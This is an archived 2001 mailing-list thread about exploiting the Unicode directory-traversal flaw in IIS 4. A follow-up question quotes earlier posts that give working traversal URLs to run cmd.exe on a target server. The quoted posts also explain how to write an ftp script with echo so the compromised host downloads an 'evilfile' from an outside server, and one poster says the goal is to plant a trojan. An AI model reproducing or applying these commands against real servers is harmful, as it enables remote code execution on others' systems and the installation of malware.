Vulnerability Development mailing list archives
Re: [unicode / iis4]
From: Tim H <tim45738 () HOTMAIL COM>
Date: Mon, 8 Jan 2001 09:59:47 -0600
Hi All, A lot of these attacks assume that the web directory is on the same drive as the system and that the system is in the winnt directory. If neither if these conditions are true, is this exploit still reasonable? Thanks, Tim -----Original Message----- From: white hat eagle [mailto:whitehateagle () USA NET] Sent: Saturday, January 06, 2001 4:32 PM To: VULN-DEV () SECURITYFOCUS COM Subject: Re: [unicode / iis4] Hi folks, in order to download a file by using mdac.pl or mdac2.pl or iis/unicode exploit you should create a file, say, ftptmp.txt and you should issue the following command ftp -n -s:ftptmp.txt where the -n switch will suppress the interactive logon mode and -s switch will contain the commands and user credentials. and the contents of the ftptmp.txt should be open x.x.x.x [or the name of the ftp server] user anonymous me () hacker com bin get evilfile bye to create this file you should use the "echo" command and redirect the content to the file ftptmp.txt as follows echo open x.x.x.x >ftptmp.txt && echo user >>ftptmp.txt....... and so on. good luck, whe- Mad Zigy <zigy () GLOBAL CO ZA> wrote: Well i have been able to use msadc2.pl yet the commands i give do not work. so i tried the other way by doing http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test .txt and all it did was say: The parameter is incorrect. so then i though maybe we cant have a > in the string so i found the hex of it and tried http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+echo+test+% 3e+c:\test.txt yet it still gave me the same: The parameter is incorrect. I have been able to make it ftp into my pc by http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+ftp+hostname but i cant make it login as i need to echo a script which i can run http://hostname/scripts/..%c0% af../winnt/system32/cmd.exe?/c+ftp+- s:c:\ftp.txt+hostname so that it will login and download the exe / trojan Thankz zigy! _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com
Current thread:
- Re: [unicode / iis4] white hat eagle (Jan 07)
- <Possible follow-ups>
- Re: [unicode / iis4] Tim H (Jan 08)
- Re: [unicode / iis4] Marco van Berkum (Jan 09)
- Re: [unicode / iis4] Ryan Yagatich (Jan 09)
- Re: [unicode / iis4]PLEASE HELP ME. Fabrizio Siciliano (Jan 24)
- Re: [unicode / iis4] Wertheimer, Ishai (Jan 10)
- Re: [unicode / iis4] Marco van Berkum (Jan 11)
- Re: [unicode / iis4] Wertheimer, Ishai (Jan 11)